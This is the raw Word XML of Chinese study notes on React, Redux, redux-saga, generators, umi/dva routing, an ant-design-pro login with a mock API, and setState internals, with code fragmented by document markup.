          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>...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args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)))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//React-redux 原理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import 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 xml:space="preserve">React </w:t>
      </w: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from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="AA1111"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">'react'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import 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 xml:space="preserve">PropTypes </w:t>
      </w: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from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="AA1111"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">'prop-types'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import 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{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>bindActionCreators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} </w:t>
      </w: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from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="AA1111"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">'./woniu-redux'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export const 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 xml:space="preserve">connect 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 xml:space="preserve">= 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mapStateToProps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>=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>state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>=&gt;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state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,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mapDispatchToProps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>=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{})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 xml:space="preserve">=&gt;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>WrapComponent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)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>=&gt;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return class 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 xml:space="preserve">ConnectComponent </w:t>
      </w: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extends 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React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Component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static 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 xml:space="preserve">contextTypes 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 xml:space="preserve">= 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store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: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PropTypes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 xml:space="preserve">object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constructor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props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, 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context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){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>super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props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, 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context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>this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 xml:space="preserve">state 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 xml:space="preserve">= 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props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:{}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componentDidMount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(){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const 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{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>store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} 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 xml:space="preserve">= </w:t>
      </w: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>this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 xml:space="preserve">context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//绑定事件，当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mapDispatchToProp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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里面的方法触发了dispatch函数，就会更新state，和调用下面的//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subscribe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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，进而调用update函数，把store上面属性和dispatch方法，放到props里面，pros变化了就触发//组件的更新了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store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subscribe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(()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>=&gt;</w:t>
      </w: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>this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update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())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>this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update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()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update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(){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const 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{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>store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} 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 xml:space="preserve">= </w:t>
      </w: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>this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 xml:space="preserve">context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const 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 xml:space="preserve">stateProps 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 xml:space="preserve">= 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mapStateToProps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store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getState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())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const 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 xml:space="preserve">dispatchProps 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 xml:space="preserve">= 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bindActionCreators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mapDispatchToProps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store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dispatch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>this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setState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({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props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:{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555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>...</w:t>
      </w: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>this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state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props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555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>...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stateProps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555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>...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 xml:space="preserve">dispatchProps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})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render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(){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return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="117700"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;WrapComponent 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{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>...</w:t>
      </w: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>this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state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props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}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="117700"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&lt;/WrapComponent&gt;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ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLine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redux-sage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与redux-thunk不同点：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ind w:left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redux-sage 踩用generator 对异步的控制性更加强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redux-sage 不会派发函数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redux-thunk 有其实有点破环redux的原则，因为redux派发的一般是对象，redux-thunk有可能派发函数。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安装：npm install --save redux-saga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Sages.js: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//call是调用异步函数的，put是通知更新的，</w:t>
      </w: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takeEvent复制全局监听action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import { call, put, takeEvery } from "redux-saga/effects";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// 模拟登录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const UserService = {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login(uname) {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  return new Promise((resolve, reject) =&gt; {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    setTimeout(() =&gt; {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      if (uname === "Jerry") {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        resolve({ id: 1, name: "Jerry", age: 20 });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      } else {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        reject("用户名或密码错误");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      }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    }, 1000);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  });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}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};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function* login(action) {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try {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  yield put({ type: "requestLogin" });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  const result = yield call(UserService.login, action.uname);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  yield put({ type: "loginSuccess", result });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} catch (message) {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  yield put({ type: "loginFailure", message });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}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}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function* mySaga() {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yield takeEvery("login", login);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}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export default mySaga;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//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/user.redu</w:t>
      </w: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x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export const user = (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state = { isLogin: false, loading: false, error: "" },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action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) =&gt;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switch (action.type)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  case "requestLogin":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    return { isLogin: false, loading: true, error: "" };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  case "loginSuccess":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    return { isLogin: true, loading: false, error: "" };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  case "loginFailure":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    return { isLogin: false, loading: false, error: action.message };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  default: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    return state;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};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export function login(uname)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return { type: "login", uname };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}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//store/indexjs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import { createStore, applyMiddleware, combineReducers } from "redux";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import logger from "redux-logger";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import thunk from "redux-thunk";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import { counterReducer } from "./count.redux";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import { user } from "./user.redux";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import createSagaMiddleware from "redux-saga";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import mySaga from "./sagas";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// 1.创建saga中间件并注册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const sagaMiddleware = createSagaMiddleware();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const store = createStore(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combineReducers({ user }),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applyMiddleware(logger, sagaMiddleware)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);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// 2.中间件运行saga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sagaMiddleware.run(mySaga);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export default store;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调用：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import { login } from "../store/user.redux";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组件调用onclick ={login},这个时候saga会拦截action提交，先执行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function* mySaga()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yield takeEvery("login", login);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}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函数,执行完逻辑在往下面走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ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLine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Generator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Function *g(){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Yield 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‘</w:t>
      </w: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a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’</w:t>
      </w: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 w:firstLine="176" w:firstLineChars="10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Yield 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‘</w:t>
      </w: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b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’</w:t>
      </w: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 w:firstLine="176" w:firstLineChars="10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Yield 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‘</w:t>
      </w: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c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’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 w:firstLine="176" w:firstLineChars="10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Return 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‘</w:t>
      </w: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ending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’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170" w:firstLineChars="10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Var gen = g();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console.log(gen.next()); // {value: "a", done: false}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console.log(gen.next()); // {value: "b", done: false}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console.log(gen.next()); // {value: "c", done: false}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console.log(gen.next()); // {value: "ending", done: true}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注意:yeild后面跟promise 的话就可以等待promise完成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事实上saga在内部通过这个函数执行逻辑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next() {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let { value, done } = gen.next();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console.log(value); // 依次打印输出 a b c end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if (!done) next(); // 直到全部完成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next();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看下面的例子：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function* say() {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let a = yield "1";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console.log(a);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let b = yield "2";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console.log(b);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let it = say("bar"); // 返回迭代器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输出 { value: '1', done: false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a的值并非该返回值，而是下次next参数,就是“我是被传进来的1”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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console.log(it.next());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输出'我是被传进来的1'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输出{ value: '2', done: false }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console.log(it.next("我是被传进来的1"));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输出'我是被传进来的2'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输出{ value: undefined, done: true } //如果yield下面还有代码，但是，没有return，放回值是undefined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console.log(it.next("我是被传进来的2"));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9"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="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基于ant的后台管理系统</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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"https://preview.pro.loacg.com/dashboard/workplace"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https://preview.pro.loacg.com/dashboard/workplace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19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基于vue的后台管理系统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"https://panjiachen.github.io/vue-element-admin/" \l "/documentation/index"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https://panjiachen.github.io/vue-element-admin/#/documentation/index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</w:p>
    <w:p>
      <w:pPr>
        <w:numPr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19"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="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umi项目开发</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:leftChars="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在config/config下面配置如下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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plugins: [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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[</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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"umi-plugin-react",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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antd: true,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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dva: true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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],</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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routes: [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numP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//login单独一页</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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{ path: "/login", component: "./login" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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numPr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path: "/",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numP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component: "../layouts",//所有内容页面的父页面，放置布局内容</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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routes: [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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// { path: "/", component: "./index" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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{ path: "/", component: "./goods/index" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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numPr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path: "/about",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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component: "./about",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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Routes: ["./routes/PrivateRoute.js"]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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numPr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numPr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path: "/users",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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component: "./users/_layout",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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routes: [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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{ path: "/users/", component: "./users/index" },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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{ path: "/users/:id", component: "./users/$id" }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="630" w:firstLineChars="300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//404单独一页</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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numPr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component: "./404"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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numPr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]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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numPr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]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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};</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr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Layout里面一般放置头部信息，导航信息，内容页面，底部信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="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过滤路由：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="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menus =[</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="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{path: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,name=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商品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}，</w:t>
      </w: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{path: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,name=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用户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}，</w:t>
      </w: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{path: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,name=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关于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numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0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]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="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selectedKeys = menus.filter(menu=&gt;{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="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If(menu.path===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){</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="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pathname===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//根目录独立放回</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="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numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="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Return pathname.start.Width(menu.path)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="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}).map(menu=&gt;menu.path)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="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4"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="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配置404页面：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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routes: [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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widowControl w:val="0"/>
        <w:numPr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component: "./404"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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widowControl w:val="0"/>
        <w:numPr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]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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 w:val="0"/>
        <w:numPr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]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25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js:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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用exception 组件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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{Exception} from 'ant-design-pro'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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function() {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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&lt;Exception type="404" backText="返回首页"&gt;&lt;/Exception&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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4"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="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login.js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routes: [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component: "./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login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"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]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]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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React, { Component } from "react";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styles from "./login.css";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 Login } from "ant-design-pro";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//用pro的集成login组件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 connect } from "dva";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{ UserName, Password, Submit } = Login;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@connect()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class extends Component {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onSubmit = (err, values) =&gt; {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console.log("用户输入：", values);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if (!err) {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// 校验通过，提交登录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this.props.dispatch({ type: "user/login", payload: values });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render() {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(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&lt;div className={styles.loginForm}&gt;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{/* logo */}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&lt;img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className={styles.logo}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src="https://img.kaikeba.com/logo-new.png"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/&gt;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{/* 登录表单 */}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&lt;Login onSubmit={this.onSubmit}&gt;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&lt;UserName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name="username"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placeholder="kaikeba"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rules={[{ required: true, message: "请输入用户名" }]}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/&gt;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&lt;Password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name="password"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placeholder="123"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rules={[{ required: true, message: "请输入密码" }]}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/&gt;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&lt;Submit&gt;登录&lt;/Submit&gt;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&lt;/Login&gt;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&lt;/div&gt;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);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4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接口模拟：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在mock文件夹中新建login.js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{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"post /api/login"(req, res, next) {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{ username, password } = req.body;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console.log(username, password);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if (username == "kaikeba" &amp;&amp; password == "123") {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return res.json({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code: 0,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data: {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token: "kaikebaisgood",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role: "admin",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balance: 1000,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username: "kaikeba"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});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if (username == "jerry" &amp;&amp; password == "123") {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return res.json({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code: 0,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data: {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token: "kaikebaisgood",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role: "user",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balance: 100,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username: "jerry"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});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res.status(401).json({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code: -1,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msg: "密码错误"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});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4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取接口数据：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Src下面新建model文件夹，新建文件user.js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axios from "axios";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router from "umi/router";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userinfo = JSON.parse(localStorage.getItem("userinfo")) || {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token: "",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role: "",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username: "",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balance: 0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api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login(payload) {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axios.post("/api/login", payload);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{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namespace: "user", // 可省略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state: userinfo, // 初始状态：缓存或空对象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effects: {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 action: user/login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*login({ payload }, { call, put }) {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try {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const {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data: { code, data: userinfo }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 = yield call(login, payload);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if (code == 0) {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// 登录成功: 缓存用户信息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localStorage.setItem("userinfo", JSON.stringify(userinfo));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yield put({ type: "init", payload: userinfo });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router.push("/");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 else {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// 登录失败：弹出提示信息，可以通过响应拦截器实现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 catch (error) {}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},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reducers: {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init(state, action) {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// 覆盖旧状态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return action.payload;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Login.js:调用onSubmit 派发事件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React, { Component } from "react";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styles from "./login.css";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 Login } from "ant-design-pro";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 connect } from "dva";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{ UserName, Password, Submit } = Login;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@connect()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class extends Component {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onSubmit = (err, values) =&gt; {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console.log("用户输入：", values);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if (!err) {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// 校验通过，提交登录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this.props.dispatch({ type: "user/login", payload: values });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render() {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(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&lt;div className={styles.loginForm}&gt;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{/* logo */}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&lt;img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className={styles.logo}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src="https://img.kaikeba.com/logo-new.png"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/&gt;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{/* 登录表单 */}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&lt;Login onSubmit={this.onSubmit}&gt;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&lt;UserName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name="username"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placeholder="kaikeba"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rules={[{ required: true, message: "请输入用户名" }]}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/&gt;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&lt;Password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name="password"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placeholder="123"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rules={[{ required: true, message: "请输入密码" }]}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/&gt;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&lt;Submit&gt;登录&lt;/Submit&gt;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&lt;/Login&gt;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&lt;/div&gt;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);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4"/>
        </w:numPr>
        <w:ind w:leftChars="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page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24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接口响应拦截：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在src下面新建固定名字的global.js，这个文件的代码会被自动执行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interceptor from './interceptor'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Interceptor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.js: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axios from "axios";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 notification } from "antd";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codeMessage = {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202: "一个请求已经进入后台排队（异步任务）。",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401: "用户没有权限（令牌、用户名、密码错误）。",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404: "发出的请求针对的是不存在的记录，服务器没有进行操作。",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500: "服务器发生错误，请检查服务器。"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仅拦截异常状态响应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axios.interceptors.response.use(null, ({ response }) =&gt; {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if (codeMessage[response.status]) {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notification.error({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message: `请求错误 ${response.status}: ${response.config.url}`,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description: codeMessage[response.status]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});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Promise.reject(err); //不影响其他地方的错误处理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4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model作用域文件</w:t>
      </w:r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2638425" cy="1028700"/>
            <wp:effectExtent l="0" t="0" r="9525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这样的话这个model只有作用在goods模块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新建goods.js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axios from "axios";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api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function getGoods() {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return axios.get("/api/goods").then(({ data }) =&gt; {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{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courses: data.courseData.data,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tags: data.courseData.tags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};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});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export default {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namespace: "goods",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state: {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courses: {},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tags: []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},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effects: {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*getList(action, { call, put }) {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const payload = yield call(getGoods);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yield put({ type: "initGoods", payload });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},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reducers: {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initGoods(state, { payload }) {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return payload;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Goods/index.js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React, { Component } from "react";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{ Card, Row, Col, Skeleton, Icon } from "antd";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{ connect } from "dva";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{ TagSelect } from "ant-design-pro";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@connect(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state =&gt; ({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courses: state.goods.courses,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tags: state.goods.tags,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loading: state.loading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}),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{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getList: () =&gt; ({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type: "goods/getList"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}),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addCart: payload =&gt; ({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type: "cart/addCart",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payload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})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Goods extends Component {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constructor(props) {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super(props);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displayCourses为需要显示的商品数组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this.state = {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displayCourses: new Array(8).fill({}) // 填充数组用于骨架屏展示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};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componentDidMount() {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this.props.getList({ foo: "bar" });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componentWillReceiveProps(props) {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(props.tags.length) {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this.tagSelectChange(props.tags, props.courses);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// 页签变更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tagSelectChange = (tags, courses = this.props.courses) =&gt; {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console.log(tags);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['js','react']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[[{}],[{}]]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[{},{}]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const displayCourses = tags.flatMap(tag =&gt; courses[tag]);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console.log(displayCourses);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this.setState({ displayCourses });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};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addCart = (e, item) =&gt; {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e.stopPropagation();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this.props.addCart(item);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};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render() {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console.log(this.props.loading);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(this.props.loading.models.goods) {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return &lt;div&gt;加载中...&lt;/div&gt;;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(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&lt;div&gt;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{/* 分类标签 */}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&lt;TagSelect onChange={this.tagSelectChange}&gt;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{this.props.tags.map(tag =&gt; {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(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&lt;TagSelect.Option key={tag} value={tag}&gt;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{tag}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&lt;/TagSelect.Option&gt;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);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})}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&lt;/TagSelect&gt;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{/* 商品列表 */}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&lt;Row type="flex" justify="start"&gt;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{this.state.displayCourses.map((item, index) =&gt; {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(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&lt;Col key={index} style={{ padding: 10 }} span={6}&gt;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{item.name ? (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&lt;Card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hoverable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title={item.name}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cover={&lt;img src={"/course/" + item.img} /&gt;}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extra={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&lt;Icon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onClick={e =&gt; this.addCart(e, item)}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type="shopping-cart"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style={{ fontSize: 18 }}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/&gt;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}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&gt;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&lt;Card.Meta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description={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&lt;div&gt;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&lt;span&gt;￥{item.price}&lt;/span&gt;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&lt;span style={{ float: "right" }}&gt;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&lt;Icon type="user" /&gt; {item.solded}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&lt;/span&gt;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&lt;/div&gt;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}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/&gt;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&lt;div /&gt;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&lt;/Card&gt;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) : (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&lt;Skeleton active={true} /&gt;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)}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&lt;/Col&gt;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);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})}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&lt;/Row&gt;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&lt;/div&gt;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);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export default Goods;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9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Rect和vue中选型？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26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看看手上的开发人员都熟悉那个，选择多数人熟悉的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26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项目是否要快速用开发vue比较合适，大型项目需要typescript支持好的react支持好一点灵活一点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9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setState原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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把state对象通过addState方法添加进pendingStates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addState(nextState) {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(nextState) {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this.pendingStates.push(nextState)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(!this.isPending) {//如果不是在更新，就立即去更新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this.emitUpdate()//2触发更新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27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触发更新函数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emitUpdate(nextProps, nextContext) {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this.nextProps = nextProps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this.nextContext = nextContext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receive nextProps!! should update immediately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//3,如果没有在更新就执行updateComponent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nextProps || !updateQueue.isPending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? this.updateComponent()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: updateQueue.add(this)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7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getState 合并所有的state的数据，一次更新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updateComponent() {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let { instance, pendingStates, nextProps, nextContext } = this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(nextProps || pendingStates.length &gt; 0) {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nextProps = nextProps || instance.props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nextContext = nextContext || instance.context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this.nextProps = this.nextContext = null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4 getState 合并所有的state的数据，一次更新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shouldUpdate(instance, nextProps, this.getState(), nextContext, this.clearCallbacks)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27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执行是否更新钩子：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function shouldUpdate(component, nextProps, nextState, nextContext, callback) {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是否应该更新 判断shouldComponentUpdate生命周期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let shouldComponentUpdate = true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(component.shouldComponentUpdate) {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shouldComponentUpdate = component.shouldComponentUpdate(nextProps, nextState, nextContext)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(shouldComponentUpdate === false) {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component.props = nextProps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component.state = nextState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component.context = nextContext || {}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let cache = component.$cache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cache.props = nextProps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cache.state = nextState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cache.context = nextContext || {}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//强制更新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component.forceUpdate(callback)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7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强制更新</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>forceUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,最重要的方法是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>compareTwoVnodes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：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forceUpdate(callback) {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实际更新组件的函数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let { $updater, $cache, props, state, context } = this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(!$cache.isMounted) {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($updater.isPending) {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$updater.addState(state)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return;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let nextProps = $cache.props || props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let nextState = $cache.state || state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let nextContext = $cache.context || context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let parentContext = $cache.parentContext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let node = $cache.node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let vnode = $cache.vnode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缓存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$cache.props = $cache.state = $cache.context = null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$updater.isPending = true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(this.componentWillUpdate) {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this.componentWillUpdate(nextProps, nextState, nextContext)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this.state = nextState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this.props = nextProps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this.context = nextContext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下面才是重点  对比vnode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let newVnode = renderComponent(this)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//diff算法对比前后两个虚拟dom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let newNode = compareTwoVnodes(vnode, newVnode, node, getChildContext(this, parentContext))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(newNode !== node) {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newNode.cache = newNode.cache || {}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syncCache(newNode.cache, node.cache, newNode)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$cache.vnode = newVnode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$cache.node = newNode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清除pending 执行didmount生命周期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clearPending()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(this.componentDidUpdate) {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this.componentDidUpdate(props, state, context)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(callback) {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callback.call(this)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$updater.isPending = false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$updater.emitUpdate()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更新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6.compareTwoVnodes就是diff算法的体现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function compareTwoVnodes(vnode, newVnode, node, parentContext) {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let newNode = node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(newVnode == null) {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remove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destroyVnode(vnode, node)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node.parentNode.removeChild(node)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 else if (vnode.type !== newVnode.type || vnode.key !== newVnode.key) {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replace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destroyVnode(vnode, node)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newNode = initVnode(newVnode, parentContext)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node.parentNode.replaceChild(newNode, node)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 else if (vnode !== newVnode || parentContext) {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same type and same key -&gt; update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newNode = updateVnode(vnode, newVnode, node, parentContext)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newNode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执行过程，先把state放到更新队列，如果发现更新队列不在更新就触发更新函数，更新函数拍平所有state（多次更新合并为一次），然后调用shouldComponentUpdate判断是否需要更新，如果更新了就执行强制更新，取出前后两个虚拟dom 通过 diff算法比较更新真实dom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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28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部署关心的几个问题：故障恢复，多核利用，端口共享，node解决上面的问题一般是用cluster模块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//app.js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Koa = require('koa');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创建一个Koa对象表示web app本身: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app = new Koa();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对于任何请求，app将调用该异步函数处理请求：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app.use(async (ctx, next) =&gt; {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console.log('ctx....')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随机产生错误</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
